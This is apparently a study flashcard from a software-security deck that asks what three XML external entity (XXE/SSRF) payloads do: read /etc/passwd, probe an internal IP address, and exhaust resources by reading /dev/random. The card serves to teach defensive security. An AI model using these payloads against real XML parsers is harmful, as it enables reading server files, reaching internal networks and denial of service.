Review Note
Last Update: 04/27/2023 06:14 AM
Current Deck: Software Security
Front
Commit #1541
What are the following SSRF/XML/XXE attacks intending to do?
1. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file:///etc/passwd" >]> <foo>&bar;</foo>
2. <!ENTITY bar SYSTEM "https://192.168.1.1/private" >]>
3. <!ENTITY bar SYSTEM "file:///dev/random" >]>
Back
Commit #1541
1. extract data from local system (server)
2. probe internal network
3. DoS by reading an endless stream